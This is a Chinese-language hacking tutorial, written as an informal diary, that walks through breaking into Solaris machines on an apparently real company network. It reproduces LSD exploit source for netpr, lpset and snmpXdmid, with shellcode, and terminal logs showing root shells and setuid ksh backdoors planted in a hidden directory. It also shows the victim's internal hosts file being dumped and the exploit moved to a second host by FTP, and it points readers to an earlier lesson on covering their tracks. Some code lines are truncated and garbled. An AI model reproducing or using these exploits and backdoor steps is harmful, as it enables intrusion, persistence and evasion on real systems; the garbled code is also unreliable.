/*## copyright LAST STAGE OF DELIRIUM dec 1999 poland *://lsd-pl.net/ #*/
/*## /usr/lib/lp/bin/netpr #*/
/* requires to specify the address of a host with 515 port opened */
#define NOPNUM 4000
#define ADRNUM 1200
#define ALLIGN 3
char shellcode[]=
"/x20/xbf/xff/xff" /* bn,a
*/
"/x20/xbf/xff/xff" /* bn,a
*/
"/x7f/xff/xff/xff" /* call
*/
"/x90/x03/xe0/x20" /* add %o7,32,%o0 */
"/x92/x02/x20/x10" /* add %o0,16,%o1 */
"/xc0/x22/x20/x08" /* st %g0,[%o0+8] */
"/xd0/x22/x20/x10" /* st %o0,[%o0+16] */
"/xc0/x22/x20/x14" /* st %g0,[%o0+20] */
"/x82/x10/x20/x0b" /* mov 0xb,%g1 */
"/x91/xd0/x20/x08" /* ta 8 */
"/bin/ksh"
;
char jump[]=
"/x81/xc3/xe0/x08" /* jmp %o7+8 */
"/x90/x10/x00/x0e" /* mov %sp,%o0 */
;
static char nop[]="/x80/x1c/x40/x11";
main(int argc,char **argv){
char buffer[10000],adr[4],*b,*envp[2];
int i;
printf("copyright LAST STAGE OF DELIRIUM dec 1999 poland //lsd-pl.net//n");
printf("/usr/lib/lp/bin/netpr solaris 2.7 sparc/n/n");
if(argc==1){
printf("usage: %s lpserver/n",argv[0]);
exit(-1);
}
*((unsigned long*)adr)=(*(unsigned long(*)())jump)()+7124+2000;
envp[0]=&buffer[0];
envp[1]=0;
b=&buffer[0];
sprintf(b,"xxx=");
b+=4;
for(i=0;i<1+4-((strlen(argv[1])%4));i++) *b++=0xff;
for(i=0;i
for(i=0;i
*b=0;
b=&buffer[5000];
for(i=0;i
for(i=0;i
*b=0;
execle("/usr/lib/lp/bin/netpr","lsd","-I","bzz-z","-U","x!x","-d",argv[1],
"-p",&buffer[5000],"/bin/sh",0,envp);
}
^D (***这里是按ctrl + d 结束写文件,你用vi来写也可以,ftp,rcp等上传也可以。***)
(***源程序在http://lsd-pl.net/files/get?SOLARIS/solsparc_netpr ***)
$ ls -al /tmp (***查看test.c是否建立***)
total 1330
drwxrwxrwt 7 sys sys 1049 Jul 4 19:07 .
drwxrwxrwx 35 root root 1024 Jun 29 16:52 ..
drwxrwxr-x 2 root root 176 May 4 14:39 .X11-pipe
drwxrwxr-x 2 root root 176 May 4 14:39 .X11-unix
drwxrwxrwx 2 root root 179 May 4 14:39 .pcmcia
drwxrwxrwx 2 root other 181 Jun 20 13:18 .removable
drwxrwxrwt 2 root root 327 May 4 14:39 .rpc_door
-rwxrwxr-x 1 root other 614 May 8 11:17 EncTest.class
-rw------- 1 root other 265936 May 4 14:40 dtdbcache_:0
-rw------- 1 render9 render 0 May 8 11:42 mpcRaOhb
-rw------- 1 render9 render 0 May 8 13:02 mptWaGYf
-rw-rw-r-- 1 root sys 5248 May 4 14:39 ps_data
-rw-rw-r-- 1 root other 0 Jun 20 13:18 sdtvolcheck399
-rw-r--r-- 1 root other 4 May 4 14:39 speckeysd.lock
-rw-rw-r-- 1 delex staff 2019 Jul 4 19:10 test.c
-rw-rw-r-- 1 root sys 326236 May 7 11:30 ups_data
$ gcc -o test test.c (***一般编译用这个方式就可以了,更多资料请查看帮助***)
$ ./test
copyright LAST STAGE OF DELIRIUM dec 1999 poland //lsd-pl.net/
/usr/lib/lp/bin/netpr solaris 2.7 sparc
usage: ./test lpserver
$ ./test localhost
copyright LAST STAGE OF DELIRIUM dec 1999 poland //lsd-pl.net/
/usr/lib/lp/bin/netpr solaris 2.7 sparc
# id
uid=1035(delex) gid=20(staff) euid=0(root) (***成功获得root***)
# mkdir /usr/lib/...
# cp /bin/ksh /usr/lib/…/.x (***做个简单的后门***)
# chmod +s /usr/lib/…/.x
# cat /etc/hosts (***看看这个网络多大***)
##################################################
## Gips Limited Server Hosts Names
## 2001-03-01 (develop)
##################################################
127.0.0.1 localhost loghost
##################################################
## Gipex (Internal - CITIC Back-End)
192.168.2.1 office-i2 gate-citic-backend
192.168.2.5 render1 render1-i1
##################################################
## Gipex (Internal - CITIC Office)
192.168.1.1 office-i1 gate-citic-office
##################################################
## Gipex (Internal - iLink)
192.168.100.1 backup-i1 gate-ilink-vpn
## .2 - .9
192.168.100.10 www1-i1
192.168.100.11 db1 db1-i1 www0-i1 www0 www0.xxwex.com
192.168.100.12 snap1
## .13
192.168.100.14 snap2
192.168.100.15 snap3
192.168.100.16 www2-i1 mail-i1
192.168.100.17 www2-i2 mail-i2
192.168.100.18 render2 render2-i1
192.168.100.19 render2-i2
## .20 - .252
192.168.100.253 switch1
## .254
# /usr/sbin/ping 192.168.100.253
ICMP Host Unreachable from gateway wc-sf1.kage.net (210.76.87.2)
for icmp from develop (192.168. 0.2) to www1-i1 (192.168.100.253)
ICMP Host Unreachable from gateway wc-sf1.kage.net (210.76.87.2)
for icmp from develop (192.168.0.2) to www1-i1 (192.168.100.253)
ICMP Host Unreachable from gateway wc-sf1.kage.net (210.76.87.2)
for icmp from develop (192.168.0.2) to www1-i1 (192.168.100.253)
^C (***局域网是连通的 ***)
#
-------------------------------------------------test--------------------------------------------------------------
以后有空再慢慢搞它的内部网吧
现在先回去把那台SunOS 5.6干掉。
-------------------------------------------------test--------------------------------------------------------------
# cat >lpset.c (***源程序在http://lsd-pl.net/files/get?SOLARIS/solsparc_lpset ***)
/*## copyright LAST STAGE OF DELIRIUM apr 2000 poland *://lsd-pl.net/ #*/
/*## /usr/bin/lpset #*/
#define NOPNUM 864
#define ADRNUM 132
#define ALLIGN 3
char shellcode[]=
"/x20/xbf/xff/xff" /* bn,a
*/
"/x20/xbf/xff/xff" /* bn,a
*/
"/x7f/xff/xff/xff" /* call
*/
"/x90/x03/xe0/x20" /* add %o7,32,%o0 */
"/x92/x02/x20/x10" /* add %o0,16,%o1 */
"/xc0/x22/x20/x08" /* st %g0,[%o0+8] */
"/xd0/x22/x20/x10" /* st %o0,[%o0+16] */
"/xc0/x22/x20/x14" /* st %g0,[%o0+20] */
"/x82/x10/x20/x0b" /* mov 0xb,%g1 */
"/x91/xd0/x20/x08" /* ta 8 */
"/bin/ksh"
;
char jump[]=
"/x81/xc3/xe0/x08" /* jmp %o7+8 */
"/x90/x10/x00/x0e" /* mov %sp,%o0 */
;
static char nop[]="/x80/x1c/x40/x11";
main(int argc,char **argv){
char buffer[10000],adr[4],*b;
int i;
printf("copyright LAST STAGE OF DELIRIUM apr 2000 poland //lsd-pl.net//n");
printf("/usr/bin/lpset for solaris 2.6 2.7 sparc/n/n");
*((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10088+400;
b=buffer;
sprintf(b,"xxx=");
b+=4;
for(i=0;i<2;i++) *b++=0xff;
for(i=0;i
for(i=0;i
for(i=0;i
for(i=0;i
*b=0;
execle("/usr/bin/lpset","lsd","-n","xfn","-a",buffer,"printer",0,0);
}
^D
# gcc -o lpset lpset.c
/bin/ksh: gcc: not found
# exit
$ gcc -o lpset lpset.c
$ ls -al
total 1410
drwxrwxrwt 7 sys sys 1236 Jul 4 20:33 .
drwxrwxrwx 35 root root 1024 Jul 4 19:15 ..
drwxrwxr-x 2 root root 176 May 4 14:39 .X11-pipe
drwxrwxr-x 2 root root 176 May 4 14:39 .X11-unix
drwxrwxrwx 2 root root 179 May 4 14:39 .pcmcia
drwxrwxrwx 2 root other 181 Jun 20 13:18 .removable
drwxrwxrwt 2 root root 327 May 4 14:39 .rpc_door
-rwxrwxr-x 1 root other 614 May 8 11:17 EncTest.class
-rw------- 1 root other 265936 May 4 14:40 dtdbcache_:0
-rwxrwxr-x 1 delex staff 8572 Jul 4 20:33 lpset
-rw-rw-r-- 1 delex staff 1685 Jul 4 20:32 lpset.c
-rw------- 1 render9 render 0 May 8 11:42 mpcRaOhb
-rw------- 1 render9 render 0 May 8 13:02 mptWaGYf
-rw-rw-r-- 1 root sys 5248 May 4 14:39 ps_data
-rw-rw-r-- 1 root other 0 Jun 20 13:18 sdtvolcheck399
-rw-r--r-- 1 root other 4 May 4 14:39 speckeysd.lock
-rwxrwxr-x 1 delex staff 8916 Jul 4 19:13 test
-rw-rw-r-- 1 delex staff 2019 Jul 4 19:10 test.c
-rw-rw-r-- 1 root sys 326236 May 7 11:30 ups_data
$ ftp 192.168.0.3
Connected to 192.168.0.3.
220 dev01 FTP server (SunOS 5.6) ready.
Name (192.168.0.2:delex): tong
331 Password required for tong.
Password:
230 User tong logged in.
ftp> cd /tmp
250 CWD command successful.
ftp> bin (***设置上传模式为二进制***)
200 Type set to I.
ftp> put lpset
200 PORT command successful.
150 Binary data connection for lpset (192.168.0.2,49105).
226 Transfer complete.
local: lpset remote: lpset
8572 bytes sent in 0.00054 seconds (15617.71 Kbytes/s)
ftp> by
221 Goodbye.
$ telnet 192.168.0.3
Trying 192.168.0.3...
Connected to 192.168.0.3.
Escape character is '^]'.
SunOS 5.6
login: tong
Password:
Last login: Wed Jul 4 20:31:37 from 192.168.0.2
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
You have mail.
$ /tmp/lpset
/tmp/lpset: cannot execute
$ chmod 755 /tmp/lpset
$ /tmp/lpset
copyright LAST STAGE OF DELIRIUM apr 2000 poland //lsd-pl.net/
/usr/bin/lpset for solaris 2.6 2.7 sparc
# id
uid=107(tong) gid=10(staff) euid=0(root) (***HOHO~死了没?***)
#mkdir /usr/lib/…
#cp /bin/ksh /usr/lib/…/.x
#chmod +s /usr/lib/…/.x
#exit
$ exit
Connection closed by foreign host. (***不管啦,脚印也不擦啦***)
$exit
遗失对主机的连接。
C:/>
-------------------------------------------------test--------------------------------------------------------------
哦,怎么不干了?断开连接了?连脚印都不擦?
嘿嘿,兄弟,现在是21:00啦,还要赶地铁呢。本来20:30就要走啦,明天继续吧,管不了那么多啦。大家先回去看我以前
的教程,温习一下该怎么擦PP。为了节省版面,这篇教程不会出现擦PP的啦,自己要懂得擦干净哦。:)
对了,明天要学习远程溢出的利用,然后找几台redhat回来。
回去啦,肚子也饿啦,明天见~~
zzzZZZZZZ~~~~~~~~
第二天:
嘿嘿,大家早上好~
今天上班好象有任务要分配,我先去问问。
稍等…
真惨,分配了任务。
不过,是从下个星期开始做。:)
所以今天就写教程吧。
不知道今天能不能写完这份教程呢。
我们继续。:)
昨天讲述了本地提升权限的方法,今天我们来说说远程溢出的利用。
几乎各种操作系统都有严重的远程溢出漏洞。
常见的有:
Solaris 2.3, 2.4, 2.5, 2.5.1, 2.6 的rpc.ttdbserverd
Solaris 2.5, 2.5.1, 2.6, 7 的 rpc.cmsd
solaris 2.6, 7 的 sadmind
Solaris 7, 8 的 snmpXdmid
Redhat 6.0, 5.1, 4.0 的Amd
Redhat 6.2, 6.1, 6.0 的 rpc.statd
Redhat 7.0 的 LPRng
…
其它的系统就不在列举了。
除了系统本身存在问题外,还有一些第三方程序存在问题。
比如常见的FTP服务器Wu-ftp,版本2.6.0及以下都存在严重的远程溢出问题
比如DNS 服务器 bind,版本8.2.2及以下版本都存在严重的远程溢出问题。
…
可以利用的东西太多了,而要掌握这些则需要时间,需要靠经验的积累。
等经验丰富后,入侵一个简单的系统,只要得到对方的系统版本,然后扫描一下端口就足够了。因为这时候你已经对各
种系统和守护进程的弱点有了很详细的了解。
我们这次来尝试进入一台 Solaris 8的机器。
-------------------------------------------------test--------------------------------------------------------------
C:/>telnet 192.168.0.2
SunOS 5.7
login: login: delex
Password:
*********************************************************
# The JRun is now replaced by JServ
# To restart the servlet server, please use
rs.sh
# However, as the JServ will reload those classes
# inside the "/usr/proj/gipex/class", you just
# need to remove the old class with the new one.
*********************************************************
$ w
9:21am up 61 day(s), 18:42, 2 users, load average: 0.03, 0.04, 0.05
User tty login@ idle JCPU PCPU what
root console 4May0162days 2 2 /usr/dt/bin/sdt_shell -c ? u
root pts/4 Fri 4pm 6days tail -f syslog
delex pts/6 9:21am w
$ls –al /usr/lib/…
total 202
drwxrwxr-x 2 root staff 512 Jul 5 10:22 .
drwxrwxr-x 46 root bin 10240 Jul 4 19:21 ..
-r-sr-sr-x 1 root staff 91668 Jul 5 10:22 .x
$ id
uid=1035(delex) gid=20(staff)
$ /usr/lib/.../.x (***运行昨天留下的本地后门直接获得root权限***)
# id
uid=1035(delex) gid=20(staff) euid=0(root)
# cd /tmp
# ls –al (***昨天的程序都忘了删呢,走得太急啦,不知道还在不在呢***)
total 1410
drwxrwxrwt 7 sys sys 1236 Jul 5 10:20 .
drwxrwxrwx 35 root root 1024 Jul 4 19:15 ..
drwxrwxr-x 2 root root 176 May 4 14:39 .X11-pipe
drwxrwxr-x 2 root root 176 May 4 14:39 .X11-unix
drwxrwxrwx 2 root root 179 May 4 14:39 .pcmcia
drwxrwxrwx 2 root other 181 Jun 20 13:18 .removable
drwxrwxrwt 2 root root 327 May 4 14:39 .rpc_door
-rwxrwxr-x 1 root other 614 May 8 11:17 EncTest.class
-rw------- 1 root other 265936 May 4 14:40 dtdbcache_:0
-rwxrwxr-x 1 delex staff 8572 Jul 4 20:33 lpset (***HOHO~**)
-rw-rw-r-- 1 delex staff 1685 Jul 4 20:32 lpset.c
-rw------- 1 render9 render 0 May 8 11:42 mpcRaOhb
-rw------- 1 render9 render 0 May 8 13:02 mptWaGYf
-rw-rw-r-- 1 root sys 5248 May 4 14:39 ps_data
-rw-rw-r-- 1 root other 0 Jun 20 13:18 sdtvolcheck399
-rw-r--r-- 1 root other 4 May 4 14:39 speckeysd.lock
-rwxrwxr-x 1 delex staff 8916 Jul 4 19:13 test
-rw-rw-r-- 1 delex staff 2019 Jul 4 19:10 test.c
-rw-rw-r-- 1 root sys 326236 May 7 11:30 ups_data
# cat > snmp.c (***源程序在http://lsd-pl.net/files/get?SOLARIS/solsparc_snmpxdmid ***)
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define SNMPXDMID_PROG 100249
#define SNMPXDMID_VERS 0x1
#define SNMPXDMID_ADDCOMPONENT 0x101
char findsckcode[]=
"/x20/xbf/xff/xff" /* bn,a
*/
"/x20/xbf/xff/xff" /* bn,a
*/
"/x7f/xff/xff/xff" /* call
*/
"/x33/x02/x12/x34"
"/xa0/x10/x20/xff" /* mov 0xff,%l0 */
"/xa2/x10/x20/x54" /* mov 0x54,%l1 */
"/xa4/x03/xff/xd0" /* add %o7,-48,%l2 */
"/xaa/x03/xe0/x28" /* add %o7,40,%l5 */
"/x81/xc5/x60/x08" /* jmp %l5+8 */
"/xc0/x2b/xe0/x04" /* stb %g0,[%o7+4] */
"/xe6/x03/xff/xd0" /* ld [%o7-48],%l3 */
"/xe8/x03/xe0/x04" /* ld [%o7+4],%l4 */
"/xa8/xa4/xc0/x14" /* subcc %l3,%l4,%l4 */
"/x02/xbf/xff/xfb" /* bz
*/
"/xaa/x03/xe0/x5c" /* add %o7,92,%l5 */
"/xe2/x23/xff/xc4" /* st %l1,[%o7-60] */
"/xe2/x23/xff/xc8" /* st %l1,[%o7-56] */
"/xe4/x23/xff/xcc" /* st %l2,[%o7-52] */
"/x90/x04/x20/x01" /* add %l0,1,%o0 */
"/xa7/x2c/x60/x08" /* sll %l1,8,%l3 */
"/x92/x14/xe0/x91" /* or %l3,0x91,%o1 */
"/x94/x03/xff/xc4" /* add %o7,-60,%o2 */
"/x82/x10/x20/x36" /* mov 0x36,%g1 */
"/x91/xd0/x20/x08" /* ta 8 */
"/x1a/xbf/xff/xf1" /* bcc
*/
"/xa0/xa4/x20/x01" /* deccc %l0 */
"/x12/xbf/xff/xf5" /* bne
*/
"/xa6/x10/x20/x03" /* mov 0x03,%l3 */
"/x90/x04/x20/x02" /* add %l0,2,%o0 */
"/x92/x10/x20/x09" /* mov 0x09,%o1 */
"/x94/x04/xff/xff" /* add %l3,-1,%o2 */
"/x82/x10/x20/x3e" /* mov 0x3e,%g1 */
"/xa6/x84/xff/xff" /* addcc %l3,-1,%l3 */
"/x12/xbf/xff/xfb" /* bne
*/
"/x91/xd0/x20/x08" /* ta 8 */
;
char shellcode[]=
"/x20/xbf/xff/xff" /* bn,a
*/
"/x20/xbf/xff/xff" /* bn,a
*/
"/x7f/xff/xff/xff" /* call
*/
"/x90/x03/xe0/x20" /* add %o7,32,%o0 */
"/x92/x02/x20/x10" /* add %o0,16,%o1 */
"/xc0/x22/x20/x08" /* st %g0,[%o0+8] */
"/xd0/x22/x20/x10" /* s "/xc0/x22/x20/x14" /* st %g0,[%o0+20] */
"/x82/x10/x20/x0b" /* mov 0x0b,%g1 */
"/x91/xd0/x20/x08" /* ta 8 */
"/bin/ksh"
;
static char nop[]="/x80/x1c/x40/x11";
typedef struct{
struct{unsigned int len;char *val;}name;
struct{unsigned int len;char *val;}pragma;
}req_t;
bool_t xdr_req(XDR *xdrs,req_t *objp){
char *v=NULL;unsigned long l=0;int b=1;
if(!xdr_u_long(xdrs,&l)) return(FALSE);
if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE);
if(!xdr_bool(xdrs,&b)) return(FALSE);
if(!xdr_u_long(xdrs,&l)) return(FALSE);
if(!xdr_bool(xdrs,&b)) return(FALSE);
if(!xdr_array(xdrs,&objp->name.val,&objp->name.len,~0,sizeof(char),
(xdrproc_t)xdr_char)) return(FALSE);
if(!xdr_bool(xdrs,&b)) return(FALSE);
if(!xdr_array(xdrs,&objp->pragma.val,&objp->pragma.len,~0,sizeof(char),
(xdrproc_t)xdr_char)) return(FALSE);
if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE);
if(!xdr_u_long(xdrs,&l)) return(FALSE);
return(TRUE);
}
main(int argc,char **argv){
char buffer[140000],address[4],pch[4],*b;
int i,c,n,vers=-1,port=0,sck;
CLIENT *cl;enum clnt_stat stat;
struct hostent *hp;
struct sockaddr_in adr;
struct timeval tm={10,0};
req_t req;
printf("copyright LAST STAGE OF DELIRIUM mar 2001 poland //lsd-pl.net//n");
printf("snmpXdmid for solaris 2.7 2.8 sparc/n/n");
if(argc<2){
printf("usage: %s address [-p port] -v 7|8/n",argv[0]);
exit(-1);
}
while((c=getopt(argc-1,&argv[1],"p:v:"))!=-1){
switch(c){
case 'p': port=atoi(optarg);break;
case 'v': vers=atoi(optarg);
}
}
switch(vers){
case 7: *(unsigned int*)address=0x000b1868;break;
case 8: *(unsigned int*)address=0x000cf2c0;break;
default: exit(-1);
}
*(unsigned long*)pch=htonl(*(unsigned int*)address+32000);
*(unsigned long*)address=htonl(*(unsigned int*)address+64000+32000);
printf("adr=0x%08x timeout=%d ",ntohl(*(unsigned long*)address),tm.tv_sec);
fflush(stdout);
adr.sin_family=AF_INET;
adr.sin_port=htons(port);
if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if((hp=gethostbyname(argv[1]))==NULL){
errno=EADDRNOTAVAIL;perror("error");exit(-1);
}
memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
}
sck=RPC_ANYSOCK;
if(!(cl=clnttcp_create(&adr,SNMPXDMID_PROG,SNMPXDMID_VERS,&sck,0,0))){
clnt_pcreateerror("error");exit(-1);
}
cl->cl_auth=authunix_create("localhost",0,0,0,NULL);
i=sizeof(struct sockaddr_in);
if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){
struct{unsigned int maxlen;unsigned int len;char *buf;}nb;
ioctl(sck,(('S'<<8)|2),"sockmod");
nb.maxlen=0xffff;
nb.len=sizeof(struct sockaddr_in);;
nb.buf=(char*)&adr;
ioctl(sck,(('T'<<8)|144),&nb);
}
n=ntohs(adr.sin_port);
printf("port=%d connected! ",n);fflush(stdout);
findsckcode[12+2]=(unsigned char)((n&0xff00)>>8);
findsckcode[12+3]=(unsigned char)(n&0xff);
b=&buffer[0];
for(i=0;i<1248;i++) *b++=pch[i%4];
for(i=0;i<352;i++) *b++=address[i%4];
*b=0;
b=&buffer[10000];
for(i=0;i<64000;i++) *b++=0;
for(i=0;i<64000-188;i++) *b++=nop[i%4];
for(i=0;i
for(i=0;i
*b=0;
req.name.len=1200+400+4;
req.name.val=&buffer[0];
req.pragma.len=128000+4;
req.pragma.val=&buffer[10000];
stat=clnt_call(cl,SNMPXDMID_ADDCOMPONENT,xdr_req,&req,xdr_void,NULL,tm);
if(stat==RPC_SUCCESS) {printf("/nerror: not vulnerable/n");exit(-1);}
printf("sent!/n");
write(sck,"/bin/uname -a/n",14);
while(1){
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sck,&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds)){
if((cnt=read(0,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(sck,buf,cnt);
}
if(FD_ISSET(sck,&fds)){
if((cnt=read(sck,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(1,buf,cnt);
}
}
}
}
^D
|
|